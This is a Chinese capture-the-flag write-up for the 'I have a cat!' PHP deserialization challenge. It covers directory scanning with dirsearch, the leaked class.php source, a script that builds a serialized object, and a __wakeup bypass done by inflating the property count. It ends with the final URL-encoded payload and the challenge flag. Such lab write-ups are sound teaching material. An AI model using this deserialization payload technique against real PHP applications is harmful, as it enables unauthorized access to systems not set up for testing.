反序列化-极客大挑战2019php【I have a cat!】

知道这个题考的是反序列化,那么我们第一反应该拿到他的源码。

根据这句话判断【因为每次猫猫都在我键盘上乱跳,所以我有一个良好的备份网站的习惯 不愧是我!!! 】说明有目录

我们直接使用dir开扫,发现有压缩文件【发现是429是因为访问人数过多寄掉了,从新开一个就好了】

复制代码
 python dirsearch.py -u http://7d464724-7bc7-4ea0-af57-391cb28fedd1.node5.buuoj.cn:81/ -e .txt,php,html,json

那我们直接访问这个,并下载,说不定就是源码呢?

解压发现它里面有index.php、class.php,进去查看一下【flag试过了,不对】

php 复制代码
 index.php
 ​
 <!DOCTYPE html>
 <head>
   <meta charset="UTF-8">
   <title>I have a cat!</title>
   <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css">
       <link rel="stylesheet" href="style.css">
 </head>
 <style>
     #login{   
         position: absolute;   
         top: 50%;   
         left:50%;   
         margin: -150px 0 0 -150px;   
         width: 300px;   
         height: 300px;   
     }   
     h4{   
         font-size: 2em;   
         margin: 0.67em 0;   
     }
 </style>
 <body>
php 复制代码
 class.php
 ​
 <?php
 include 'flag.php';
 ​
 ​
 error_reporting(0);
 ​
 ​
 class Name{
     private $username = 'nonono';
     private $password = 'yesyes';
 ​
     public function __construct($username,$password){
         $this->username = $username;
         $this->password = $password;
     }
 ​
     function __wakeup(){
         $this->username = 'guest';
     }
 ​
     function __destruct(){
         if ($this->password != 100) {
             echo "</br>NO!!!hacker!!!</br>";
             echo "You name is: ";
             echo $this->username;echo "</br>";
             echo "You password is: ";
             echo $this->password;echo "</br>";
             die();
         }
         if ($this->username === 'admin') {
             global $flag;
             echo $flag;
         }else{
             echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
             die();
 ​
             
         }
     }
 }
 ?>

分析:index里面没有太大的信息,class里面【直接丢进chat gtp】得到了flag的关键信息

php 复制代码
 类 Name 的关键部分
 __wakeup() :当对象从序列化字符串中恢复时调用,它会将$username的值重置为'guest'。
 __destruct() :当对象被销毁时调用。它首先检查$password是否不等于100,如果不是,则输出当前的用户名和密码。如果$username是'admin',则输出全局变量$flag的值。
 总结:获得flag需绕过__wakeup,并且满足password=100,username==='admin' 

接下来我们进行构造

php 复制代码
 <?php
 class Name{
     private $username ='admin';
     private $password = '100';
 }
 $select =new Name();
 $res = serialize($select);
 echo $res;
 //echo urlencode($res);
复制代码
php 复制代码
运行结果:
O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}
把空格【就是那个方格子】替换为%00

在这里当修改的属性(变量)数大于实际的个数时,就可以绕过 wakeup了【其实就是将2改为3,绕过__wakeup()而已】

php 复制代码
 O:4:"Name":3:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}
 最后这一步要编译一哈
 ?select=O%3A4%3A"Name"%3A3%3A{s%3A14%3A"%00Name%00username"%3Bs%3A5%3A"admin"%3Bs%3A14%3A"%00Name%00password"%3Bs%3A3%3A"100"%3B}
php 复制代码
 flag{b0b9ceb2-4aac-4714-821c-1b4554d0acd1}
相关推荐
脑子慢且灵9 小时前
【JavaWeb】一个简单的Web浏览服务程序
java·前端·后端·servlet·tomcat·web·javaee
诗人不说梦^14 小时前
[RootersCTF2019]I_<3_Flask
web·ctf
OEC小胖胖3 天前
Next.js数据获取入门:`getStaticProps` 与 `getServerSideProps`
前端·前端框架·web·next.js
借你耳朵说爱你3 天前
浅拷贝和深拷贝两种不同的对象复制
vue·web
诗人不说梦^4 天前
[CISCN2019 总决赛 Day2 Web1]Easyweb
web·ctf
OEC小胖胖4 天前
Next.js 介绍:为什么选择它来构建你的下一个 Web 应用?
开发语言·前端·web·next.js
OEC小胖胖4 天前
页面间的导航:`<Link>` 组件和 `useRouter`
前端·前端框架·web·next.js
练习时长两年半的Java练习生(升级中)5 天前
从0开始学习Java+AI知识点总结-30.前端web开发(JS+Vue+Ajax)
前端·javascript·vue.js·学习·web
科技树支点6 天前
无GC的Java创新设计思路:作用域引用式自动内存管理
java·python·go·web·编程语言·编译器
OEC小胖胖7 天前
React学习之路永无止境:下一步,去向何方?
前端·javascript·学习·react.js·前端框架·react·web